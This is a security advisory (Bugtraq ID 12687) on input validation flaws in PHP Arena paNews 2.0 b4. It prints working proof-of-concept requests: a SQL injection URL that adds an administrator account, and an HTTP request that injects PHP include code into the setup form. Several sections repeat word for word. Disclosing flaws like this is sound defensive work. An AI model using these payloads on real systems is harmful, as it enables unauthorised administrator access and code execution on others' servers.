PHP Arena PANews Remote Input Validation Vulnerabilities
BID:12687
Info
PHP Arena PANews Remote Input Validation Vulnerabilities
| Bugtraq ID: | 12687 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2005 12:00AM |
| Updated: | Mar 01 2005 12:00AM |
| Credit: | FraMe <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
PHP Arena paNews 2.0 b4 |
| Not Vulnerable: | |
Discussion
PHP Arena PANews Remote Input Validation Vulnerabilities
Multiple input validation vulnerabilities affect PHP Arena paNews. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.
The first issue reported is an SQL injection issue. The second issue is a local script injection issue.
An attacker may leverage these issues to execute arbitrary server-side scripts that exist on an affected server, and to inject SQL syntax into queries against the underlying database.
Multiple input validation vulnerabilities affect PHP Arena paNews. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.
The first issue reported is an SQL injection issue. The second issue is a local script injection issue.
An attacker may leverage these issues to execute arbitrary server-side scripts that exist on an affected server, and to inject SQL syntax into queries against the underlying database.
Exploit / POC
PHP Arena PANews Remote Input Validation Vulnerabilities
No exploit is required to leverage these issues. The following proof of concept has been provided:
SQL injection proof of concept:
http://www.example.com/panews/index.php?action=login&username=frame&password=amo&mysql_prefix=panews_auth` VALUES ("","frame","d41d8cd98f00b204e9800998ecf8427e","hackit","admins|cat|comment|newsadd|newsedit|prefset|setup","none","127.0.0.1",1,1)%00
Script injection proof of concept:
GET http://hawking/panews/index.php?action=admin&op=setup&form[lang]=english&form[comments]=1&form[autoapprove]=1;%20?%3E%20%3C?%20include(%22/var/cpuinfo%22);%20?%3E%20%3C?%20$trivial=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: hawking
Referer: http://hawking/panews/index.php
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Cookie: panews=%BF%3F%BF%3F0%BF%3F1108908178%BF%3F%BF%3Fframe%BF%3F0; IS_PANEWS=1
Keep-Alive: 300
Proof of concept paNews.c has been released by Silentium. It exploits the SQL injection issue to create a new user with administrator privileges on an affected server.
No exploit is required to leverage these issues. The following proof of concept has been provided:
SQL injection proof of concept:
http://www.example.com/panews/index.php?action=login&username=frame&password=amo&mysql_prefix=panews_auth` VALUES ("","frame","d41d8cd98f00b204e9800998ecf8427e","hackit","admins|cat|comment|newsadd|newsedit|prefset|setup","none","127.0.0.1",1,1)%00
Script injection proof of concept:
GET http://hawking/panews/index.php?action=admin&op=setup&form[lang]=english&form[comments]=1&form[autoapprove]=1;%20?%3E%20%3C?%20include(%22/var/cpuinfo%22);%20?%3E%20%3C?%20$trivial=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: hawking
Referer: http://hawking/panews/index.php
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Cookie: panews=%BF%3F%BF%3F0%BF%3F1108908178%BF%3F%BF%3Fframe%BF%3F0; IS_PANEWS=1
Keep-Alive: 300
Proof of concept paNews.c has been released by Silentium. It exploits the SQL injection issue to create a new user with administrator privileges on an affected server.
Solution / Fix
PHP Arena PANews Remote Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP Arena PANews Remote Input Validation Vulnerabilities
References:
References:
- paNews Homepage (PHP Arena)
- Kernelpanik Labs Digest 2005-2 ("Kernelpanik Labs - Security Lists"
)